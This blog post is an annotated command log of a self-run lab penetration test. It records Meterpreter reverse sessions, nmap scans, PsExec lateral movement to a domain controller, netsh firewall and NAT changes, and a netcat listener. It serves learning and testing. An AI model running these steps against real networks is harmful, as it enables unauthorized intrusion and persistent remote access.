(NOTE: I apologize for the screwed up indentation and formatting in the latter part of this post but the editor for this blog sucks and I don't have time to do all the html by hand)
In my last post I noted that I would continue with the attempted compromise for a couple more days. I'm happy to report that I was able to succeed in getting a hole through the gateway firewall and a netcat listener on an internal workstation, thanks to Mark Russinovich and Psexec. The following is an annotated scrollback buffer from the attack machine wks-Matriux:
/* My scrollback didn't capture everything... this is the tail end of output from ps shortly after a meterpreter session was created */
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > shell
Process 1644 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program files\ps>c:\bin\whoami
c:\bin\whoami
TEST\usr1
/* This is the start of my attempts to work with psexec, took a bit of fiddling to get it right. It is important to use the /accepteula argument on first run, or a window pops up that you can't see or respond to. After that, I dont' think it's necessary */
C:\Program files\ps>psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
/* I'll leave this first banner in, because Mark deserves credit. I will eliminate the rest though (should have a -q switch?) */
PsExec v1.59 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:
C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:
C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
Logon failure: unknown user name or bad password.
PsExec could not start netsh on WKS-XP1:
/* I finally figured you had to supply the usr name in DOMAIN\user format. I cheated a little since psexec doesn't "pass the hash" I used the real password. I think this is acceptable though, since the attacker already has the password hashes and would probably be able to crack the password. If nothing else, I could have created my own user and supplied the password, added it to the domain admin group, etc. */
C:\Program files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 whoami
psexec \\srv-DC -u TEST\usr1 -p usr1 whoami
whoami exited on srv-DC with error code 0.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
NAT must be installed first.
netsh exited on WKS-XP1 with error code 0.
/* I am not quite sure why it was telling me this. Maybe because you have to be elevated to run the command, but as you'll see later, it warns me that I am not elevated. */
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp
The following command was not found: advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp.
netsh exited on WKS-XP1 with error code 1.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
The following command was not found: "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp".
netsh exited on WKS-XP1 with error code 1.
C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"
The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp on WKS-XP1:
C:\Program files\ps>copy c:\bin\nc.exe .
copy c:\bin\nc.exe .
1 file(s) copied.
C:\Program files\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322
Directory of C:\Program files\ps
04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,678,976 bytes free
/* Here I copied netcat into the current directory, just to make it easier to work with. I then ran an nmap scan on srv-dc to see what ports were available. */
C:\Program files\ps>cd ..
cd ..
C:\Program Files>cd nmap
cd nmap
C:\Program Files\nmap>nmap -sS -F -n -v 192.168.2.1
nmap -sS -F -n -v 192.168.2.1
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-13 23:08 Central Standard Time
Initiating ARP Ping Scan at 23:08
Scanning 192.168.2.1 [1 port]
Completed ARP Ping Scan at 23:08, 0.85s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.2.1 [100 ports]
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 135/tcp on 192.168.2.1
Discovered open port 445/tcp on 192.168.2.1
Discovered open port 49157/tcp on 192.168.2.1
Discovered open port 49155/tcp on 192.168.2.1
Discovered open port 389/tcp on 192.168.2.1
Discovered open port 49154/tcp on 192.168.2.1
Discovered open port 88/tcp on 192.168.2.1
Discovered open port 5357/tcp on 192.168.2.1
Completed SYN Stealth Scan at 23:08, 2.68s elapsed (100 total ports)
Nmap scan report for 192.168.2.1
Host is up (0.027s latency).
Not shown: 91 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
5357/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:33:48:CD (Cadmus Computer Systems)
Read data files from: C:\Program Files\nmap
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
Raw packets sent: 193 (8490B) | Rcvd: 11 (482B)
C:\Program Files\nmap>cd ..\ps
cd ..\ps
/* In the following few lines, I was trying to copy nc.exe over to srv-dc and execute it. I guess I don't grasp the concept of how psexec uses the -c argument */
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357
Can't grab 192.168.2.1:5357 with bind
nc.exe exited on WKS-XP1 with error code 1.
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157
Can't grab 192.168.2.1:49157 with bind
nc.exe exited on WKS-XP1 with error code 1.
C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
/* Here I decided to just try and do a direct copy. When that failed I tried to map the Admin$ share. That also failed, I think because I was using an impersonation token rather than actually running in a process owned by usr1. */
C:\Program Files\ps>copy nc.exe \\svr-DC\admin$
copy nc.exe \\svr-DC\admin$
The network path was not found.
0 file(s) copied.
C:\Program Files\ps>net use z: \\svr-DC\admin$
net use z: \\svr-DC\admin$
The server is not configured for remote administration.
More help is available by typing NET HELPMSG 3743.
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe
1216 svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > migrate 348
[*] Migrating to 348...
[*] Migration completed successfully.
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>net use * \\192.168.2.1\admin$
net use * \\192.168.2.1\admin$
Drive Z: is now connected to \\192.168.2.1\admin$.
The command completed successfully.
/* It worked after migrating into a process owned by usr1 */
C:\Documents and Settings\usr1.TEST>cd c:\progra~1\ps
cd c:\progra~1\ps
C:\PROGRA~1\ps>copy nc.exe z:\
copy nc.exe z:\
1 file(s) copied.
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
/* huh? */
C:\PROGRA~1\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322
Directory of C:\PROGRA~1\ps
04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,658,496 bytes free
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h
The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:
C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h
psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h
The system cannot find the file specified.
PsExec could not start c:\windows\nc.exe on WKS-XP1:
C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157
Can't grab 192.168.2.1:49157 with bind
nc.exe exited on srv-DC with error code 1.
/* Was the AcceptEULA screwing things up? now it runs on srv-dc */
C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999
psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999
^C
Terminate channel 1? [y/N] n
[-] Error running command shell: SignalException SIGUSR1
/* In the preceding, netcat started running, but I had no way to interact with it. Ctrl C tends to end up killing the whole session rather than just the command shell channel. I discovered a way to avoid this on Matriux (Ubuntu): Press alt+F2 and it pops up krunner (I think that's what it's called) click the icon just left of the text box and you get a thing much like Process Explorer. Find metasploit under Konsole (running as ruby), right click it and send it the SIGUSR1 signal and it usually puts you back into the meterpreter session. */
meterpreter > rev2self
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe
meterpreter > shell
Process 1564 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>c:\bin\whoami
c:\bin\whoami
TEST\usr1
C:\Documents and Settings\usr1.TEST>exit
meterpreter > rev2self
meterpreter > getuid
Server username: TEST\usr1
meterpreter > shell
Process 1540 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>nc -vv -n 192.168.2.1 9999
nc -vv -n 192.168.2.1 9999
hello
(UNKNOWN) [192.168.2.1] 9999 (?): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
C:\Program Files\ps>hello
'hello' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe
meterpreter > kill 1776
Killing: 1776
meterpreter > kill 344
Killing: 344
meterpreter > shell
Process 180 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\server-dc -u TEST\usr1 -p usr1 tasklist
psexec \\server-dc -u TEST\usr1 -p usr1 tasklist
The network path was not found.
Couldn't access server-dc:
Make sure that the default admin$ share is enabled on server-dc.
C:\Program Files\ps>net use * /delete
net use * /delete
You have these remote connections:
Z: \\192.168.2.1\admin$
\\192.168.2.50\IPC$
\\srv-DC\IPC$
Continuing will cancel the connections.
Do you want to continue this operation? (Y/N) [N]:
No valid response was provided.
C:\Program Files\ps>net use Z: /delete
net use Z: /delete
Z: was deleted successfully.
C:\Program Files\ps>psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist
psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist
The network path was not found.
Couldn't access svr-dc:
Make sure that the default admin$ share is enabled on svr-dc.
C:\Program Files\ps>ping -n 2 192.168.2.1
ping -n 2 192.168.2.1
Pinging 192.168.2.1 with 32 bytes of data:
Reply from 192.168.2.1: bytes=32 time=2ms TTL=128
Reply from 192.168.2.1: bytes=32 time=5ms TTL=128
Ping statistics for 192.168.2.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 5ms, Average = 3ms
C:\Program Files\ps>exit
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
/* Things had gotten all screwed up by this point, with zombie processes running on srv-dc and
wks-xp1 so I killed the session, killed the zombies manually, and restarted the exploit.
*/
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > jobs
Jobs
====
No active jobs.
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 2 opened (192.168.1.188:31337 -> 192.168.1.250:62571)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 2
[-] The 'stdapi' extension has already been loaded.
meterpreter > shell
Process 1028 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp on srv-DC:
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" di
psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh
netsh exited on srv-DC with error code 0.
/* The preceding appears weird because I had copied the command into the console, realized it was wrong, and tried to correct it. The console wouldn't let me backspace past the beginning of the line so I ended up running a "half command" via psexec. I do see that it works though. I finally got the quoting right. I think the dash in the name argument was screwing things up and needed to be quoted. */
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
The requested operation requires elevation.
netsh exited on srv-DC with error code 1.
C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp
Ok.
netsh exited on srv-DC with error code 0.
/* Woo hoo! added the -s argument to run as system and it worked I now have a firewall rule in place */
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999
192.168.1.188 is not an acceptable value for proto.
netsh exited on srv-DC with error code 1.
/* Oops, missed a necessary argument. Added it and tried again but things got screwed for unknown reasons and I had to exit and rerun the exploit to start a new session. */
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
Terminate channel 1? [y/N]
n
Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter >
meterpreter >
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > background
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter NT AUTHORITY\SYSTEM @ WKS-XP1 192.168.1.188:31337 -> 192.168.1.250:62571
msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 3 opened (192.168.1.188:31337 -> 192.168.1.250:61734)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 3
[-] The 'stdapi' extension has already been loaded.
meterpreter > pwd
C:\WINDOWS\TEMP
meterpreter > shell
Process 308 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
The static port mapping from 192.168.1.188/9999 to 192.168.2.50/9999 requires 192.168.1.188 to be part of a configured address range. To define a static port mapping on this interface's assigned IP address, please specify 0.0.0.0 as the public address for the mapping.
netsh exited on srv-DC with error code 1.
/* I was trying to limit access to only wks-Matriux. It didn't work and it was too late at night to understand why, so I just set to 0.0.0.0 */
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999
netsh exited on srv-DC with error code 0.
/* OK, I think I now have portmapping and a firewall rule in place :) */
C:\Program Files\ps>netsh
exit
exit
/* Hanging screwiness follows, had to terminate and re-establish session */
Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter > it
[-] Unknown command: it.
meterpreter > exit
[*] Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 4 opened (192.168.1.188:31337 -> 192.168.1.250:61737)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 4
[-] The 'stdapi' extension has already been loaded.
meterpreter > shell
Process 1008 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
Ok.
/* This is adding the firewall opening to the local workstation. Netsh is different on XP */
C:\Program Files\ps>schtasks /?
schtasks /?
SCHTASKS /parameter [arguments]
Description:
Enables an administrator to create, delete, query, change, run and
